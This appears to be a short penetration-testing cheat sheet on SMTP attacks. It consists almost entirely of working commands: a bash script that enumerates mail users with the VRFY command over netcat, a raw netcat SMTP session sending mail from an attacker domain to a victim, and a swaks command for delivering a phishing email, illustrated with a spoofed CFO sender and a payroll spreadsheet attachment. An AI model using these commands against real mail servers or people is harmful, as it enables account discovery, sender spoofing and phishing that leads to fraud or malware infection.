SMTP user enumeration script
#!/bin/bash
if [ "$#" -ne 2 ]; then
echo "Usage: $0 <username> <ip>"
exit 1
fi
ip="$2"
username="$1"
# Check if netcat (nc) is installed
if ! command -v nc &> /dev/null; then
echo "netcat (nc) is not installed. Please install it before running this script."
exit 1
fi
# Connect to the SMTP server and send VRFY command
result=$(echo -e "VRFY $username\r\n" | nc -n -w 5 $ip 25)
# Print the result
echo "$result"
SEND email using netcat
nc -C example.com 25
HELO <attackers domain> # ex. hacker.com
MAIL FROM:<attacker email> # bad@hacker.com
RCPT TO:<victims email>
DATA
From: <attacker email>
To: <victim email>
Subject: <subject>
Date: Fri , 20 Jan 2023 10:00:00 +0000
<Email body>
.
Sendind a phising email
sudo swaks -t <TARGET EMAIL> --from <SENDER EMAIL> \
--attach @<ATTACHED FILE> --server <SMTP ADDRESS> --body @<BODY.txt FILE> \
--header "<HEADER>" --suppress-data -ap
#ex. sudo swaks -t john@mail.com -t jane@mail.com
#--from cfo@mail.com --attach @payrolls.xls --server 192.168.1.2
#--body @body.txt --header "Subject: Monthly Payrolls" --suppress-data -ap